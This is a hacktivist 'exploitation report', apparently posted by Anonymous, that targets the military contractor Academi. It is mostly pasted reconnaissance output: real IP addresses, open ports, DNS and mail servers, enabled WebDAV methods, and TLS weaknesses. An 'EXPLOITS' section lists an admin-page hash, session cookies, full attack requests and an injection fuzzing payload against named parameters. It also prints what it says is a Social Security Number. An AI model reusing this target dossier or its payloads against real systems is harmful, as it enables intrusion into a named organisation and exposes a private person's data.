- EXPLOITATION & VULNERABILITY OF ACADEMI / ALSO KNOWN AS BLACKWATER (RAMBO'S). BY ANON-NINJA-CAT, CONTACT INFOSEC-CAT THROUGH ENCRYPTED CODE, WHO WILL CONTACT CONE-CAT FOR CLEARANCE TO THE CYBER-HIVE. /MILD EXPLOITATION REPORT/
- WE ARE ANONYMOUS
- WE ARE LEGION
- WE ARE GHOSTS OF THE CYBER-HIVE.
- https://www.academi.com/
- Academi is an American private military company, founded in 1997 by Erik Prince. Formerly known as Blackwater, the company was renamed Xe Services in 2009, and "Academi" in 2011.
- IP Address 54.243.51.249
- Server Type nginx
- Server:nginx
- IP Address:54.243.51.249
- Port:443
- Hostname:www.academi.com
- The target site *has* a DNS wildcard configuration
- The contents of https://54.243.51.249 differ from the contents of https://www.academi.com
- The URL "https://www.academi.com/" has the following allowed methods, which include DAV methods: ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
- The mail account: "feedback@academi.com" was found in:
- - https://www.academi.com/
- Name server / IP / Location
- ns1.dnsbycomodo.net 8.20.241.1 usa
- ns2.dnsbycomodo.net 8.20.243.1 usa
- mail.academi.com A 1 hour 67.238.84.240 (Biglerville, PA, US)
- www.academi.com A 1 hour 54.243.51.249 (US)
- Hostname:*.academi.com
- Organization:ACADEMI LLC
- Locality:Moyock
- State:North Carolina
- Country:US
- report for ec2-54-243-51-249.compute-1.amazonaws.com (54.243.51.249)
- Host is up (0.063s latency).
- PORT STATE SERVICE
- 21/tcp filtered ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- report for amazonaws.com (72.21.206.80)
- Host is up (0.0060s latency).
- Other addresses for amazonaws.com (not scanned): 72.21.210.29 207.171.166.22
- rDNS record for 72.21.206.80: 206-80.amazon.com
- PORT STATE SERVICE
- 80/tcp open http
- ---------------------------------------------------------------------------------------------------------------------------------
- # See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
- #
- # To ban all spiders from the entire site uncomment the next two lines:
- # User-Agent: *
- # Disallow: /
- User-agent: *
- Disallow: /checkout
- Disallow: /cart
- Disallow: /orders
- Disallow: /countries
- Disallow: /line_items
- Disallow: /password_resets
- Disallow: /states
- Disallow: /user_sessions
- Disallow: /user_registrations
- Disallow: /users
- Disallow: /account
- ------------------------------------------------------------------------------------------------------------------------------------
- EXPLOITS:
- The URL: "https://www.academi.com/admin.php" returned a response that may contain a "MD5" hash. The hash is: "5c16451fd9ead8323c89fc4c1f23aebb".
- The URL: "https://www.academi.com/" possibly discloses a US Social Security Number: "261-52-8395
- The URL: "https://www.academi.com/" sent the cookie: "_academi_session=RE45aUppcVhQYW9GSHVpSHpvVTNteXZzN1FpekNQa09jaDc1T05QL3pZSHhrYVRCYytyR1FhTi9PaUlxZWZEL01iM0t6bWtnZUE5U0pKSW1iU1RBNVVlNkFXdUxqZnV2dVVkcElQc0M2elJMZXdCNTBBQlZMT3dWd1RXYm5ESlNBWkw5TGZYZks1cVZtLzdXeHpDbkY0SURVTzlCR2NGMVNET1d4eEFPYyszT3g1NHkxY0tUL0JEN0dJMXFnTWtLLS13bDVQV0xJN0hTYWI2VTRyclhLS0dnPT0%3D--897595f414a1d8dc7b914ba7786eeaa19d06c434; path=/; HttpOnly". This information was found in the request with id 1.
- An unidentified vulnerability was found at: "https://www.academi.com/", using HTTP method GET. The sent data was: "mode=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29"
- GET https://www.academi.com/?mode=phpinfo HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=NlpxM09DYWR2akxEL09tS3VJams5NytqZ3l6M3I3RjBmVzhCcTd3dnhNelJuaUVaWlFGdmFIYXp0QmZwcUJ0KzZZcjhZL28vTGVhSDlxQXFFS3lYM1N4alhpbnNFWW5FVDRVakxBYzdYTC9Tc25UcS9EdEQ3RDBHRnVNTm5pOS96ZVJXTWJuSXVrNXllUGlvTnRraFZmR1cyRTJUZks1a2xxcWMzZzc4UmVqc1l6SGJ2bjlSUjZuVDdyNHdCaytBLS1MRGw2cW1SR3dzckhwRGNURE8reFFnPT0%3D--4e8872122a34a7f33ff3a632095285d7b042033f;
- An unidentified vulnerability was found at: "https://www.academi.com/admin.php", using HTTP method GET. The sent data was: "mode=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29
- GET https://www.academi.com/admin/login HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=THhUckh5NDdOc0t1T3ViYWZMc0pjazI1WDlxT29uSmY4dDFXSWUwL0lSRXBEZVBpT0dxWCtOTHZ5R0pOVFlxOTgyQTM2TkxyWXpVbjJSVW5kS1BmdEZKeFBNSGxXeWtzWFFvOFdtdUZReERsNVM5TDhpTDlPUUNQOTdzK3ZHYmk4ZFJGVm9PTCtKbUFBcE1EcDNVNmhCVUhUbEdWazRTSFNmZXZFdnEycFF3TldpTE5uZko0SkhSWkpjTGZQMHBLLS16ZVBJaFJ6MUR5K2JyQlNNRXk4VVNBPT0%3D--44a81cba5181ca0d9b39101ed7f9a330dce6f62c;
- An unidentified vulnerability was found at: "https://www.academi.com/", using HTTP method GET. The sent data was: "view=d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29"
- GET https://www.academi.com/?view=phpinfo HTTP/1.1
- Host: www.academi.com
- Cookie: _academi_session=S202YW9BTTBEWmtyOWpWVm1YTzIwc3VBa0M2UE9vM3FjemdRVUs3bkRhaStDSHpYWGFra0QvWGNyUTM3ZFpQTjZ4TXcvUkdSb0lLT0xsWXdEcU1waEtDUDZFLzBZZnZvai93RnpnSkJGSWxvZkNDRVhZbUJ1UnVJREdqaFpRa0RnVG5YQ01HTjBBdEl3VkxYTXdjT0NSWTRDS09yT0JXbW9iN1RiVDY3d0NCU3VYMW5xNHVmdks3MXEvRWhuQkRrLS02dU5ZblZGOW1PQlRybmhRazFzSTFBPT0%3D--7d4fbd67edc6c386ca4a9757d4c500668f4970d5;
- TLS v1.1 and TLS v1.2 should be enabled
- Server should enable more recent versions of TLS protocol
- Server does not have session resumption enabled
- Users may experience slower performance
- Server has not enabled HTTP Strict-Transport-Security
- Users may be exposed to man-in-the-middle attacks
- Server is mixing http and https content
- Attackers may be able to manipulate the page.
- Server uses RC4 cipher with modern browsers
- More secure ciphers are available for TLS 1.1 and newer
- Server configuration does not meet FIPS guidelines
- Federal standards for data handling are not being met
- SSL 2.0 Disabled:Pass
- SSL 3.0 Disabled:Pass
- TLS 1.0 Enabled:Pass
- TLS 1.1 Enabled:Fail <<<<<
- TLS 1.2 Enabled:Fail <<<<<
- Weak ciphersuites disabled:Pass
- Certificates configured correctly:Pass
- Secure renegotiation configured:Pass
- Session resumption configured:Fail <<<<<
- BEAST Vulnerability:Pass
- OCSP Stapling:Fail <<<<<
- PCI Compliant:Pass
- FIPS Compliant:Fail <<<<<
- Forward Secrecy Supported:Pass
- Heartbleed Vulnerability:Pass
- Strict Transport Security:Fail <<<<<
- Mixed Content (HTTP and HTTPS):Fail <<<<<<
- Domain name resolves to IPv4 address:Pass
- Domain name resolves to IPv6 address:Fail <<<<<
- ===================================================================================================================================
- http://www.academiproshop.com (67.132.195.12)
- 80/tcp open http
- [ .NET Configuration Analysis ]
- Server -> Microsoft-IIS/6.0
- AppTrace -> LocalOnly
- Application -> /
- ADNVersion -> 2.0.50727.5710
- Found -> /aspnet_client/system_web/2_0_50727 <<<<<<<<